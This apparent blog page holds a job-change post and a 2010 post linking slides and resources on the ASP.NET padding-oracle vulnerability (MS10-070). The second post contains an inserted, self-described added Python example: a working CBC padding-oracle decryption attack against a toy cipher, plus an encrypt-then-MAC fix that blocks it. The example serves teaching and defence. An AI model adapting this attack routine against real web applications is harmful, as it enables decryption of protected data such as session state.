Wednesday, March 09, 2011
Last month I started in a new role at Aura Software Security, where I am a security consultant. I'm excited about all the fun stuff I'll be doing, getting involved with security advice, training and testing at all stages of the development lifecycle.

However, starting a new job means leaving another, and I'm sad to leave Xero. It has been a blast working at Xero, and I have made some great friends, had a lot of laughs, and been a part of building something pretty special.

In terms of this blog, I predict that nothing much will change -- I will continue to post infrequently, usually triggered by a promise to post some event slides or other online. If you're subscribed, you've probably noticed that most of my posts tend to be around web security, and I doubt that will change!

Kirk

posted on Wednesday, March 09, 2011 8:09:04 PM (New Zealand Standard Time, UTC+12:00)
Wednesday, September 29, 2010
Thanks to those user group members and Xero partners that came along to our talk today.

We covered the two vulnerabilities released last week, the workarounds, and the patches that were released this morning.

Here are the slides: KirkJackson-PaddingOracle.pdf (641.14 KB)

All ASP.NET applications are affected. The best thing to do is install the patches released this morning.


Problem & bulletins:

Security bulletin MS10-070

Useful info on ScottGu's blog

Forum about the security vulnerability

Video of a site exploit, even with the workarounds applied

Patch:

Scott Gu's writeup of the patch

Post-mortem of the patch - Marc Brooks

How to configure the new patched features

Research:

Juliano Rizzo and Thai Duong and their POET tool

PadBuster tool (including a great writeup of padding oracles)
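The research links above describe the padding-oracle technique the talk covered. As an added illustration, which is not from the slides, the original post or the linked tools, here is a minimal Python version of the attack against a CBC-mode cipher, next to an encrypt-then-MAC oracle that makes the same queries fail. An 8-round Feistel network over SHA-256 stands in for AES so the block runs on the standard library alone; the attack treats the cipher as a black box and needs only the server's "padding valid / invalid" answer. The oracle functions, key, IV and the sample "viewstate" string are constructed for the example.

```python
"""Added example: CBC padding-oracle decryption and the authenticate-then-decrypt fix.
The Feistel cipher below is a toy stand-in for AES; the attack never looks inside it."""
import hashlib
import hmac
import os

BLOCK = 16


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key, rnd, half):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]  # toy round function


def block_encrypt(key, block):
    left, right = block[:8], block[8:]
    for rnd in range(8):
        left, right = right, _xor(left, _f(key, rnd, right))
    return left + right


def block_decrypt(key, block):
    left, right = block[:8], block[8:]
    for rnd in reversed(range(8)):
        left, right = _xor(right, _f(key, rnd, left)), left
    return left + right


def pkcs7_pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def pkcs7_unpad(data):
    n = data[-1] if data else 0
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")  # the distinguishable failure the attacker relies on
    return data[:-n]


def cbc_encrypt(key, iv, plaintext):
    out, prev, padded = b"", iv, pkcs7_pad(plaintext)
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key, iv, ciphertext):
    out, prev = b"", iv
    for i in range(0, len(ciphertext), BLOCK):
        blk = ciphertext[i:i + BLOCK]
        out += _xor(block_decrypt(key, blk), prev)
        prev = blk
    return pkcs7_unpad(out)


def make_padding_oracle(key):
    """Vulnerable server: answers only 'padding ok / not ok', but that one bit is enough."""
    def oracle(iv, ciphertext):
        try:
            cbc_decrypt(key, iv, ciphertext)
            return True
        except ValueError:
            return False
    return oracle


def _recover_block(oracle, prev, target):
    """Learn D_k(target) byte by byte (last byte first) by forging the preceding block
    so that the padding check passes; XOR with the real previous block gives plaintext."""
    inter = bytearray(BLOCK)                # D_k(target) recovered so far
    for pos in range(BLOCK - 1, -1, -1):
        pad = BLOCK - pos                   # padding value we force this round
        forged = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):
            forged[j] = inter[j] ^ pad      # known bytes are made to decrypt as `pad`
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged), target):
                continue
            if pos == BLOCK - 1:
                # Valid padding could be \x02\x02 rather than \x01: disturb the byte to the
                # left and require the oracle to still say ok before accepting the guess.
                probe = bytearray(forged)
                probe[pos - 1] ^= 0xFF
                if not oracle(bytes(probe), target):
                    continue
            inter[pos] = guess ^ pad
            break
        else:
            raise RuntimeError("oracle accepted no forgery: nothing leaks at this position")
    return _xor(inter, prev)


def padding_oracle_attack(oracle, iv, ciphertext):
    blocks = [iv] + [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    plain = b"".join(_recover_block(oracle, blocks[i - 1], blocks[i]) for i in range(1, len(blocks)))
    return pkcs7_unpad(plain)


def encrypt_then_mac(key, mac_key, iv, plaintext):
    ct = cbc_encrypt(key, iv, plaintext)
    return ct + hmac.new(mac_key, iv + ct, hashlib.sha256).digest()


def make_mac_checked_oracle(key, mac_key):
    """Fixed server: verify the tag over iv||ciphertext before decrypting, so a forged
    block never reaches the padding check and every forgery gets the same 'no'."""
    def oracle(iv, blob):
        ct, tag = blob[:-32], blob[-32:]
        if not hmac.compare_digest(hmac.new(mac_key, iv + ct, hashlib.sha256).digest(), tag):
            return False
        try:
            cbc_decrypt(key, iv, ct)
            return True
        except ValueError:
            return False
    return oracle


def demo_attack(secret=b"viewstate: user=alice; role=admin"):   # constructed sample
    key, iv = os.urandom(16), os.urandom(16)
    ct = cbc_encrypt(key, iv, secret)
    return padding_oracle_attack(make_padding_oracle(key), iv, ct)  # attacker never has key


def demo_attack_blocked(secret=b"viewstate: user=alice; role=admin"):
    key, mac_key, iv = os.urandom(16), os.urandom(16), os.urandom(16)
    blob = encrypt_then_mac(key, mac_key, iv, secret)
    try:
        padding_oracle_attack(make_mac_checked_oracle(key, mac_key), iv, blob[:-32])
    except RuntimeError:
        return True                          # no forgery was ever accepted
    return False


if __name__ == "__main__":
    print(demo_attack())
    print("attack blocked by MAC:", demo_attack_blocked())
```

The cost is at most 256 oracle queries per byte plus the occasional confirmation probe, so a 48-byte ciphertext falls in a few thousand requests; on a real site each "query" is an HTTP request whose error response (status code, page body or timing) plays the role of the boolean. The MAC-checked oracle shows why the remedy is to authenticate the ciphertext before touching the padding: the attacker cannot produce a valid tag for a forged block, so the server's answer carries no information.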

posted on Wednesday, September 29, 2010 8:25:39 PM (New Zealand Standard Time, UTC+12:00)